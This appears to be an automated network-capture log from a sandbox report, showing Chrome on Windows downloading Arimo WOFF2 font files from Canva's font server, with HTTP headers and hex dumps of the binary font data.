                                                                                                                                                                                                                                                    x-amz-id-2: pYoxlXSsBeGWJAVL30xhvj2OrmmMLYJAvXzd3hgg3Mm8u/Q3km0v6MLtTQv2i4RMtb0zrJbxBa8=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: 6ZPV0BBCRYVZSRWR
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: f.QbCaPsri50N2PPCxNm2oujPRpTIVF_
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:34 UTC787INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 33 6f 58 67 39 71 63 77 31 67 6d 67 4a 2e 57 64 56 51 58 4a 53 2e 71 38 74 74 63 57 45 5f 4d 36 58 77 65 57 42 48 4a 6f 45 69 73 2d 31 37 33 34 36 34 33 36 35 33 2d 31 2e 30 2e 31 2e 31 2d 65 78 36 36 4e 37 73 37 31 59 49 39 72 5a 5a 46 51 58 56 2e 58 32 2e 79 71 41 4b 4c 76 35 50 68 54 52 4a 70 78 6d 67 30 73 33 54 7a 31 52 6d 68 75 33 71 56 59 70 30 2e 4f 4c 36 71 41 65 44 73 49 66 39 74 68 47 6c 34 62 45 53 37 54 7a 72 33 77 59 48 54 70 51 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 31 39 2d 44 65 63 2d 32 34 20 32 31 3a 35 37 3a 33 33 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 63 61 6e 76 61 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61
                                                                                                                                                                                                                                                    Data Ascii: Set-Cookie: __cf_bm=3oXg9qcw1gmgJ.WdVQXJS.q8ttcWE_M6XweWBHJoEis-1734643653-1.0.1.1-ex66N7s71YI9rZZFQXV.X2.yqAKLv5PhTRJpxmg0s3Tz1Rmhu3qVYp0.OL6qAeDsIf9thGl4bES7Tzr3wYHTpQ; path=/; expires=Thu, 19-Dec-24 21:57:33 GMT; domain=.canva.com; HttpOnly; Secure; Sa
                                                                                                                                                                                                                                                    2024-12-19 21:27:34 UTC1369INData Raw: 77 4f 46 32 00 01 00 00 00 03 11 ac 00 15 00 00 00 06 b9 a4 00 03 11 3c 00 01 3b 23 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 83 6a 1b 82 a2 50 1c 96 4a 14 94 1c 06 60 16 a3 14 00 94 12 08 85 08 09 8f 34 11 10 ca 90 bc 64 12 83 e5 28 01 36 02 24 03 d0 5c 13 a8 28 cb d0 64 04 20 05 8c 63 07 81 cf 75 0c 89 03 5b 3a b8 b6 1e 2a a3 b6 6a e0 16 d8 e1 59 11 48 f0 c4 cc 2c 07 24 c2 a9 c1 27 d1 e4 b1 73 b4 fd be 50 48 5c ac e7 10 59 8c b9 f7 31 f3 60 44 69 6b ed 18 d2 02 2a 47 db 57 2f 38 43 1d c3 43 e6 a9 b5 d9 3c da e8 a2 9c 87 b2 7f 05 48 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 7f 83 cb 8f e7 73 f3 cf cc 7b af 33 77 7b 5b 76 12 02 d9 20 09 04 12 42 0c a0 80 54 51 c0 62 01 b5 5a ac df fe fe 85 88 12 03 eb 7c 48 b3 1c 45 e0 4b b6 a2 6c
                                                                                                                                                                                                                                                    Data Ascii: wOF2<;#jPJ`4d(6$\(d cu[:*jYH,$'sPH\Y1`Dik*GW/8CC<Hs{3w{[v BTQbZ|HEKl
                                                                                                                                                                                                                                                    2024-12-19 21:27:34 UTC1369INData Raw: 19 ee 19 c2 3d e3 ee 8d 81 23 0b c5 f5 96 32 17 7b fc 6f 9c 3e f6 98 77 37 36 29 53 02 22 8c 5b 4f 14 04 8a a8 16 d1 ac 36 7d ec 47 37 c4 29 2e 31 45 13 b7 a7 ac 5e d3 67 b6 5f f8 ef 5b fa f9 ee ab aa ee d1 d7 48 fa 39 f7 e6 d9 b3 d4 19 1b a0 48 a8 01 34 41 c6 68 11 76 f0 9f a7 e5 fc 73 ef 93 59 cd 46 7c 93 8d 41 48 70 0d fa d1 e0 81 21 88 f8 87 52 24 a4 b8 85 40 5b 8a fd 02 35 82 96 22 35 ff 54 a9 a8 64 77 de 80 aa 43 39 26 08 17 c2 5d 1d 34 14 d4 29 c5 65 8d e3 06 68 b4 09 e8 1f 18 da 4a ca 1b 9e 9f 5b 2f 7e 6c fb db fe a2 60 b0 91 23 06 0c 09 91 81 92 2a 55 22 a1 b4 01 06 e6 9d 58 6c 46 a1 a2 9e 72 8a 85 01 2a 7a 06 c6 d9 28 da e0 61 05 88 81 05 06 67 c5 fc c9 cd 3e 1e 31 92 ec 10 41 02 c1 c3 24 c3 20 13 20 7b 62 da 5d 79 45 ed 95 b5 e6 4d 79 5e a9 54
                                                                                                                                                                                                                                                    Data Ascii: =#2{o>w76)S"[O6}G7).1E^g_[H9H4AhvsYF|AHp!R$@[5"5TdwC9&]4)ehJ[/~l`#*U"XlFr*z(ag>1A$ {b]yEMy^T
                                                                                                                                                                                                                                                    2024-12-19 21:27:34 UTC1369INData Raw: 1b 4a a0 08 5d 03 96 8a ad 88 21 af 73 1b 42 78 9d 2e f7 8f bb 79 f3 1a 42 f9 85 4e 78 b7 38 d0 f5 f7 f6 c5 be 50 62 4f 28 b1 84 26 b6 4b a0 9b 48 37 a1 54 c4 2c 73 27 e2 07 f0 91 ec 78 67 db bb 26 e3 1a db 7a ea 5e 5f c2 be 33 77 36 90 7e 96 b9 12 89 9e f6 fe e6 0c 63 e5 84 0b b1 02 36 1f c3 6b 8f e1 12 33 29 41 4f 0c 48 be 62 33 f9 bf 6f d3 9f 3b b3 84 a4 36 31 1f 4e 0f a1 e2 1b 13 b6 36 9d 28 44 b6 62 d0 67 06 7d 66 f0 4c a2 35 01 9e d3 57 d9 9a 53 fd 0d 35 85 9a 6e 9e 29 f0 0f d1 95 d5 ab ea 9e a8 03 f8 00 4c 00 af 78 9a 0b 27 1b b1 4e e0 ea 68 74 fd 1d e2 e7 f4 df bd 17 cc 82 07 08 a6 45 2b 98 14 97 80 87 60 12 42 48 90 40 90 20 26 c5 ac 14 28 52 8a 94 ae 4a 65 d5 75 1d 6b b7 b6 d3 ea 5f b7 df ad e4 b0 d5 b5 d9 bd d0 8d 6f f0 56 a0 05 20 df f8 65 7c
                                                                                                                                                                                                                                                    Data Ascii: J]!sBx.yBNx8PbO(&KH7T,s'xg&z^_3w6~c6k3)AOHb3o;61N6(Dbg}fL5WS5n)Lx'NhtE+`BH@ &(RJeuk_oV e|
                                                                                                                                                                                                                                                    2024-12-19 21:27:34 UTC1369INData Raw: 5b 37 95 e7 e0 0a 48 58 9f 99 5d 7b 25 97 8e 52 01 0e 40 01 34 00 d2 b0 bc 10 7d 7f 91 bc 35 40 5d 27 4f 97 7f 05 c6 f1 57 64 39 94 0d 18 05 73 96 b3 90 47 23 b3 7e 9f ce 48 98 7d 2a dc 62 f7 20 23 25 8b c8 b2 a3 6b 70 a5 5e 4c d7 e0 ee 30 ee 9b ff df 54 fd da 77 5f 98 19 0c 06 23 42 d4 00 92 2c 92 ff 6f 80 fc 4d d3 1b 52 0b 50 0e 54 3c 00 c7 3a 87 ce 64 47 77 bb 99 9c fb 06 97 e2 70 60 1d 02 a0 42 da 4f a5 f5 d2 1b 33 07 23 f9 83 b4 1c 69 ef 11 88 cf 9f f4 bd 9b ab 54 a6 90 cb 6d 8a 5f 6d b9 5b 6e 51 6d 53 ba dd a6 6d 17 7a be 0b 54 67 42 7f 04 cf 24 c8 d9 50 ae af b2 c0 05 aa 68 01 b0 d0 b7 5f ac be 09 07 3b 20 dd 7a d1 68 08 71 f1 ff 70 b0 96 70 a9 99 93 f0 44 cb fa d9 ab 7e 9f 34 43 2a 4e ad 5c e1 f0 b2 bb 9a 34 f5 88 7b 90 15 8e d5 f0 3c fd ec 9d 25
                                                                                                                                                                                                                                                    Data Ascii: [7HX]{%R@4}5@]'OWd9sG#~H}*b #%kp^L0Tw_#B,oMRPT<:dGwp`BO3#iTm_m[nQmSmzTgB$Ph_; zhqppD~4C*N\4{<%
                                                                                                                                                                                                                                                    2024-12-19 21:27:34 UTC1369INData Raw: 06 e4 b1 2e f4 be 7c a1 ed 87 5f 21 e2 db a1 87 c9 f6 90 0d 42 0b ea 3c bf 3e 32 31 09 92 94 8c 1c 80 0e 88 c2 bb cc 08 a4 3e cc 1f 20 2c 36 87 e2 b6 dd 39 29 50 b2 93 d9 a4 2d 6e a2 41 9b 5e c3 a6 2c d9 b4 d3 51 67 5d f5 a4 cf fb ba df 64 94 72 9a de f3 5a a1 a3 1a 39 71 e6 c2 95 1b 77 ee e7 39 37 b4 e1 8d 61 51 b0 76 18 00 97 db 78 9e 16 b8 72 c3 f0 da 16 0d a2 6e 9e a3 dd 31 c6 39 41 d2 7d ca 54 7e 9e 9f 67 f2 be fa 38 3a db 8b bd ea d3 4a 7a 7a 22 33 9b ed 9b 50 bf 19 36 eb 36 d4 1e 51 c6 48 e5 67 39 e7 fc dd 23 27 eb d4 c0 b6 98 2e a2 d7 b6 b6 3b e4 5f 82 6a c3 b4 4d f7 24 a7 3c dd 99 ce 66 2e 47 18 51 5c 20 2c a8 b9 7d 65 ed d5 31 b0 62 8a 2e 5e 89 b8 e9 8b b9 36 f3 b0 85 91 ee 62 4f 05 39 71 1c 73 71 bb e1 30 fb 2f 7a b8 d3 e1 d5 13 d5 f9 f6 f6 39
                                                                                                                                                                                                                                                    Data Ascii: .|_!B<>21> ,69)P-nA^,Qg]drZ9qw97aQvxrn19A}T~g8:Jzz"3P66QHg9#'.;_jM$<f.GQ\ ,}e1b.^6bO9qsq0/z9
                                                                                                                                                                                                                                                    2024-12-19 21:27:34 UTC1369INData Raw: 3c 89 13 a3 9b f8 45 05 82 2b 3c e3 73 89 00 13 78 31 3a f9 66 a3 59 0f 60 09 4a d3 d6 3c b1 c8 e4 c8 00 a6 61 b1 f0 3b c5 26 2c b0 08 0d 24 1c c5 ba 98 39 60 75 5e 0e 14 df f6 71 02 df 3b a3 d8 cb 65 08 c3 ae 81 c9 de c2 b0 32 5b d9 bf 40 69 1a 6a bc 9c 0f bc cc 2f 68 3a 6d 3a 2b 19 51 e3 73 b9 c2 ec f3 ae 28 c4 02 3c 5d b8 4b 93 a2 a9 be b1 99 d8 19 14 d0 b3 c4 97 5a 7d 93 7a 85 52 95 17 ac cc 18 45 52 5f b7 fc dc ae 69 0f 47 75 23 7a a1 54 ff 90 a1 38 e7 2f cb 1b b3 bc fd 0f f2 15 ea 8b cd f6 5e a8 68 89 f5 4b f3 de 44 b9 42 fb ae 98 6d dc 0f 7e 77 5b bd 56 dd 06 db 2c 54 b4 df ac 77 a6 46 aa b7 15 bc 98 80 64 8c 62 18 b0 a4 82 0a aa af 13 a9 9f 46 2d cb 3a 57 c8 df b3 19 8c b1 6a 39 f7 2e 22 8c cf b2 71 48 00 44 2c 4f 4b 0f ca ad 62 62 44 b8 99 5e db
                                                                                                                                                                                                                                                    Data Ascii: <E+<sx1:fY`J<a;&,$9`u^q;e2[@ij/h:m:+Qs(<]KZ}zRER_iGu#zT8/^hKDBm~w[V,TwFdbF-:Wj9."qHD,OKbbD^
                                                                                                                                                                                                                                                    2024-12-19 21:27:34 UTC1369INData Raw: f2 ed 24 3c 4b 7c 57 34 86 f2 d3 3b b2 51 ac 55 39 36 b3 39 c4 74 4e 44 49 77 2e 9b bc 9e bb 21 53 72 59 ed 7d 6d da b8 0d 1d ce 21 f2 32 90 64 48 26 42 55 58 20 15 68 e9 e8 2b 0e 89 21 00 76 39 22 b9 a0 ee fb b2 d5 77 85 71 59 0d 51 eb b1 d6 71 ce dd cb 87 4c 7f 87 d3 9d ce bc ac 8c d9 a2 82 8a ae de 8f 2b df da 90 88 ab 36 c4 10 46 cf 79 a1 a5 34 4e a3 dd 7e 24 31 22 b3 c9 39 eb 1e 6c 47 a6 d7 56 5f 85 b7 46 f6 2e b8 0f da 93 fe 33 ac dd a0 0b 4d e6 c6 05 66 18 19 b8 2c cf c3 16 0f 06 35 26 81 48 3c ea 34 1f ea de e0 9a e6 84 e2 76 8d 1e 37 23 01 ac 4f df 79 70 83 3f e2 76 f9 52 3a 8d 76 9c 7c 2e 17 e7 84 59 23 b4 23 2e 4d e6 26 21 13 a6 54 34 b4 74 70 06 04 12 40 b1 b2 73 70 a9 db 0d 40 92 b8 66 2f 63 e1 ba ba 89 3b 90 49 2e 2e 00 33 28 a4 a4 54 a0 69
                                                                                                                                                                                                                                                    Data Ascii: $<K|W4;QU969tNDIw.!SrY}m!2dH&BUX h+!v9"wqYQqL+6Fy4N~$1"9lGV_F.3Mf,5&H<4v7#Oyp?vR:v|.Y##.M&!T4tp@sp@f/c;I..3(Ti
                                                                                                                                                                                                                                                    2024-12-19 21:27:34 UTC1369INData Raw: 46 ce 3c 0a 22 df 2a c3 48 c6 1d 4d 8e 17 bf 4f 39 af 63 e3 d4 44 7e cc 79 39 6f f1 d7 c2 c9 b4 8b 63 c9 9e 91 25 93 1b 3b 19 a4 61 29 f0 30 5a 2f 20 0c e3 66 2a 4d c6 f2 51 50 de 4a 42 90 4b ce 55 90 a2 6a ff fe 8d 14 6b 28 d6 0e f6 b1 18 0f 16 ce 33 62 90 9e a2 27 18 10 77 1b 86 4d 83 b3 8f 94 69 f4 0a 4a 1c 4c 4d 63 f0 ec 33 18 1f e9 90 2c fd b6 28 34 ab 67 5f 63 8f d8 3a 95 dd 3f c6 51 09 2b 1f 45 2a b6 55 18 0e c5 41 f4 b7 68 70 f4 f7 40 d5 4e ec 07 e0 b0 e9 bf 54 0f 13 5e bb a4 8e 17 a3 80 98 3d 31 69 ec 19 fc d9 29 d2 5a 48 15 d9 02 95 11 35 36 40 77 db 84 49 9b 23 5a 8f 16 0d 67 3a 2b 34 31 b3 de bb 34 74 c2 34 21 fe 29 65 6a ad 21 2a ea f9 99 83 92 1d 5d 32 c8 4d dd c0 e3 ed 1c cd e5 c6 99 a2 d9 ea 21 f9 69 d7 7c 50 14 7f fa 98 4a 46 11 39 ee 13
                                                                                                                                                                                                                                                    Data Ascii: F<"*HMO9cD~y9oc%;a)0Z/ f*MQPJBKUjk(3b'wMiJLMc3,(4g_c:?Q+E*UAhp@NT^=1i)ZH56@wI#Zg:+414t4!)ej!*]2M!i|PJF9
                                                                                                                                                                                                                                                    2024-12-19 21:27:34 UTC1369INData Raw: 30 9c bd bb 41 1b 74 e0 6d 01 87 55 48 f5 31 5b f7 3d f2 5d c2 99 db 9a 07 e6 a0 14 8a 2a a7 8d 40 e6 ec 21 67 c6 c8 d5 bd ed 60 13 52 ef ef 4a ef 9b 35 ed 2c 86 fd cc e0 ab 3e 1f 75 ab 15 50 c4 a3 19 7d 08 11 ab 11 f4 22 fa 1f 16 3a 9e 2b 78 22 44 c8 79 1a 04 50 13 1b dc f0 08 9a 4d cc a4 fa 12 cc 73 b5 ee 26 d3 8a 86 57 72 5b f6 3a 83 58 71 f8 2c a0 31 17 6f 89 b7 f1 c9 42 0c 9c b1 f3 07 cc 58 cc e8 6b 90 c7 69 20 51 08 59 c2 88 53 77 89 3d 73 8e 2b 96 db 91 db 38 f9 c3 8f 1c 3b 97 69 0f 66 b5 3c 4c 0c a5 9d 05 98 c3 7a ca 07 aa 76 f1 14 0e 62 c4 a3 cf 11 92 76 f4 90 38 64 46 7c 04 b1 2d f0 4b 67 3e a9 cc 66 85 16 4c 3c e6 f0 13 76 29 db 86 f5 fa c4 4d a9 4d 47 f6 e7 09 54 92 25 a0 cd 1d 1f 9a a2 b0 a9 47 46 8f b1 40 f9 19 9f 25 34 a6 56 85 7c 62 e5 bc
                                                                                                                                                                                                                                                    Data Ascii: 0AtmUH1[=]*@!g`RJ5,>uP}":+x"DyPMs&Wr[:Xq,1oBXki QYSw=s+8;if<Lzvbv8dF|-Kg>fL<v)MMGT%GF@%4V|b


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    53192.168.2.449802104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC636OUTGET /YACgEZ1cb1Q/0/Arimo.7ac02a544211773d9636e056e9da6c35.7.f8f199f09526f79e87644ed227e0f651.woff2 HTTP/1.1
                                                                                                                                                                                                                                                    Host: font-public.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1249INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:33 GMT
                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                    Content-Length: 194188
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a342d2e5e73-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Age: 1764966
                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                    ETag: "654ba7fa32ccfd8c24e11f29b7156a34"
                                                                                                                                                                                                                                                    Expires: Fri, 19 Dec 2025 21:27:33 GMT
                                                                                                                                                                                                                                                    Last-Modified: Tue, 22 Dec 2020 02:11:05 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_font-public
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-id-2: byhTNi18i6PM1HLlAcI2MglY5O3OdMD4fE6B6rgOt4kY02Yrb+/GWDcdgD3e3zDW75oJxNVfNNk=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: FYPHXPBW3FEP3H18
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: a7U_7Jx2xEmFYTgvPDOeb4VpAX2RwGex
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC791INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 79 64 67 65 42 50 61 78 6e 4b 42 7a 56 74 4e 72 53 6f 6e 6a 64 4a 68 2e 39 7a 6f 43 6d 62 6d 4f 7a 64 4b 38 7a 64 74 6d 70 69 77 2d 31 37 33 34 36 34 33 36 35 33 2d 31 2e 30 2e 31 2e 31 2d 4a 36 5f 76 41 75 5f 32 6b 4d 54 54 30 6a 4f 34 64 76 6a 51 53 72 73 67 44 49 72 58 4a 53 31 5f 71 6f 4b 33 6c 39 51 6f 6d 42 34 5f 4e 6f 73 6f 44 51 76 33 45 42 70 45 79 7a 53 4b 30 73 65 6d 57 59 41 4d 44 5a 6b 73 6e 4e 4c 68 4d 6e 6d 56 65 5a 59 4b 66 51 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 31 39 2d 44 65 63 2d 32 34 20 32 31 3a 35 37 3a 33 33 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 63 61 6e 76 61 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61
                                                                                                                                                                                                                                                    Data Ascii: Set-Cookie: __cf_bm=ydgeBPaxnKBzVtNrSonjdJh.9zoCmbmOzdK8zdtmpiw-1734643653-1.0.1.1-J6_vAu_2kMTT0jO4dvjQSrsgDIrXJS1_qoK3l9QomB4_NosoDQv3EBpEyzSK0semWYAMDZksnNLhMnmVeZYKfQ; path=/; expires=Thu, 19-Dec-24 21:57:33 GMT; domain=.canva.com; HttpOnly; Secure; Sa
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC698INData Raw: 77 4f 46 32 00 01 00 00 00 02 f6 8c 00 15 00 00 00 06 a7 d4 00 02 f6 1c 00 01 3b 23 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 83 76 1b 82 a7 26 1c 96 4a 14 94 1c 06 60 16 a3 14 00 94 12 08 85 08 09 8f 34 11 10 ca 90 94 2e 12 83 e5 28 01 36 02 24 03 d0 5c 13 aa 5a cb d0 64 04 20 05 8c 6f 07 81 cf 75 0c 86 43 5b 64 a6 b6 16 fe bf a7 f2 ce 29 e3 b5 ce 42 c7 cd 6c ef 47 89 25 74 32 0c 41 aa 40 ad 21 55 d5 7d 84 1e 44 a3 4a f6 33 df 41 65 88 2a 1e b5 c9 be 06 ae 63 0c 8f 6c 30 94 ca 5e bf 75 24 92 43 bc 27 8d 2a 9b 5d c3 5b 89 0f 5a c9 a6 e6 fd ff ff ff ff ff ff ff ff ff ff ff ff ff cd 25 8b a8 a9 55 f7 b2 dd 3d 3b fb b1 c0 82 40 0f 46 b2 10 88 47 42 60 30 12 12 7a e2 28 7e 62 eb 49 9c c4 ce 3d 10 35 46 5c e4 e3 84 a4 59 f0 38 04 39 d2 6a
                                                                                                                                                                                                                                                    Data Ascii: wOF2;#v&J`4.(6$\Zd ouC[d)BlG%t2A@!U}DJ3Ae*cl0^u$C'*][Z%U=;@FGB`0z(~bI=5F\Y89j
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1369INData Raw: 2b 71 c9 68 f0 f5 76 ca 3c 1d 9e 65 59 59 9e e2 b9 e9 99 6f 36 5b bb 02 06 47 74 84 17 18 27 10 c6 11 21 33 da ad 95 1d 7d 28 f1 4a d5 d2 d2 84 7c 3b 21 ca fc 41 64 fe 27 a7 2f f5 2a b5 00 2b ec 1b f7 42 4f c9 f7 b4 77 d0 8c 93 0c e9 70 cd 29 e2 2f 57 34 e7 9d 63 85 9f b3 1f 71 cb 09 5a b3 03 23 63 17 e4 2f e6 b9 f2 9e 34 98 9b 0e 9a cb f3 a9 c0 31 f1 df 50 fc 23 81 07 42 16 91 e2 4e 99 d6 df 4c 5c 6c 6b 82 5b 0f 59 19 4e 36 c4 19 b9 2f e6 6f ee 6e 7f c4 85 d4 10 c5 f7 59 b2 95 08 51 e4 d5 ad 72 d4 7c a2 ef 1a c9 57 3d ff e5 0b 0c 45 92 d5 5d fa 14 a9 a0 46 e4 a7 f7 ad 9a 92 7a 53 95 08 ca 4c 61 42 9a a6 9c 33 f5 54 d0 cc 9b 68 26 d1 01 26 ef b0 a1 6d 5b 5d 44 d9 ea 27 7c e0 67 a9 f8 1f 7c ed 7b 96 65 59 76 81 a4 f2 31 2f fc 0f f6 f9 36 cb b2 2c 23 71 08
                                                                                                                                                                                                                                                    Data Ascii: +qhv<eYYo6[Gt'!3}(J|;!Ad'/*+BOwp)/W4cqZ#c/41P#BNL\lk[YN6/onYQr|W=E]FzSLaB3Th&&m[]D'|g|{eYv1/6,#q
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1369INData Raw: cd ed 7f ed 7d f6 3e 77 6a 26 84 10 92 0c b5 29 36 9a 35 96 0e 58 ea 11 c5 86 52 d4 87 94 fe 29 4d 1f 20 0f 21 f4 17 4b 47 2c ff 89 43 f5 49 2c 0d 1b b6 52 1e 99 b9 7b c0 66 b3 ca f8 7e e0 c2 04 64 4c b7 49 c1 8f 31 8d ef b9 b6 a8 51 61 4a 03 b1 24 2f 7b f5 d7 38 68 25 05 80 ff 84 8b ad c2 6d 4f c9 16 5b d5 9f 27 f3 a7 7f 6e 99 56 ee dc b9 53 b7 cc ec cc ee ac 76 25 ad a4 d1 ee 3e bd 26 d1 65 da 5b f1 68 06 1e 92 31 b8 34 ba 3b 7e 0f 70 c5 36 e0 9e c2 37 38 21 b1 e3 14 37 e2 90 8a 4b 4d 80 90 d2 dd 7e f2 f0 8f c1 3f 76 9a f3 bf 41 cb a2 ce e7 eb d2 98 25 b6 ec 24 ed a3 0f 74 34 2c 17 05 3f cf 9b 5b 7f ce bd af cd bc 99 79 6f ea 9b fe a6 b5 e4 4d 32 a9 24 30 43 0b 81 20 19 4a 10 08 31 51 b1 d4 c4 d2 16 31 83 75 95 85 64 57 ac e8 26 df 05 4b 4b c4 c8 62 23
                                                                                                                                                                                                                                                    Data Ascii: }>wj&)65XR)M !KG,CI,R{f~dLI1QaJ$/{8h%mO['nVSv%>&e[h14;~p678!7KM~?vA%$t4,?[yoM2$0C J1Q1udW&KKb#
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1369INData Raw: b4 09 ee 79 5e d3 b4 19 c1 2e 5a 1e 59 4e d2 d4 7f 51 e5 aa 26 83 cd 4a 62 0c e8 43 ba a4 05 06 a0 df 21 43 0e a8 ed 8a b9 04 5e 03 cd 34 ff bf 1a 83 16 df c0 4b ff 59 d1 a8 57 2a 96 48 0e 2a 5e 23 76 f0 a2 4f 24 fd 5f a6 f6 99 be 21 8f 55 03 ec 56 1d 48 b9 e6 d9 91 e7 2a 22 2e 88 78 d9 af ad 9c 32 36 fa a5 20 ec 7e 3d 1c 76 f7 00 cb 41 63 ff 15 a6 f1 0d 66 b8 da 02 86 f7 59 33 83 bd 2b 60 70 8e d2 19 ca 9a c8 b8 2d 85 c6 86 00 b8 75 02 c0 84 c4 ae d6 9d 5d 6e f4 43 99 24 30 69 28 85 17 64 0a 15 65 2a 85 c7 43 75 5f ea 76 75 0e 7e b6 8b 8d a9 a1 06 1c c5 6f 7b 00 4d 05 68 2d c1 00 2e 60 2e a3 50 2c f1 ff 7f a9 49 ff f5 f7 78 56 3e b3 65 b6 43 0f da 18 1a 30 af 53 2a 20 a1 09 0a 60 f3 ff 97 22 5d 3f 7d d9 92 b6 8d b5 da 86 3c e9 da 5e 65 6d 69 2c ad 13 58
                                                                                                                                                                                                                                                    Data Ascii: y^.ZYNQ&JbC!C^4KYW*H*^#vO$_!UVH*".x26 ~=vAcfY3+`p-u]nC$0i(de*Cu_vu~o{Mh-.`.P,IxV>eC0S* `"]?}<^emi,X
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1369INData Raw: 19 59 4b 22 02 73 23 23 fc 24 84 90 15 8e 87 b9 6d 83 e5 33 47 d5 7e fc dd 87 4d 33 8f 40 18 17 ad d3 ea e7 bf 49 0c da 62 8c 3b c6 a2 98 c5 42 8b 85 ac 34 d2 bc 7b b5 be 92 fe 7f 78 d9 e5 6e f0 53 10 b9 5d 17 f0 12 55 66 19 a1 ca eb fc bf 6d fe 7f 03 d9 09 a3 ac f3 3c ed 1d c7 af 37 cc 5d 3d 9e d6 96 80 13 a2 73 2d 60 44 0c 83 0c 61 30 44 84 10 42 b2 b3 49 b2 07 11 ad 43 6f 9b ff ef e0 84 4d 91 7b 8e 3d cb da fb d6 de bf 65 f3 f6 f6 78 d4 b2 04 04 a4 6c 22 22 22 45 a4 56 91 2a 22 2a 26 11 21 84 90 75 32 49 06 08 0f e5 72 3f 4b 7b 0a 79 6a 55 d4 29 e0 b7 56 b5 cc 84 a2 b5 61 b9 5e 4d 46 31 96 c7 a7 bb 4c f0 9b 6e 23 6c 08 7e 6a 1b 8d 90 fe 47 b9 87 55 61 3c 6a 20 55 cb 8e 7e 6e 0d f0 e2 11 bf 1e 9f df 70 1c 3d e1 71 f2 c9 1c bf 73 ab c7 ff 8a b2 fb 4f 9e
                                                                                                                                                                                                                                                    Data Ascii: YK"s##$m3G~M3@Ib;B4{xnS]Ufm<7]=s-`Da0DBICoM{=exl"""EV*"*&!u2Ir?K{yjU)Va^MF1Ln#l~jGUa<j U~np=qsO
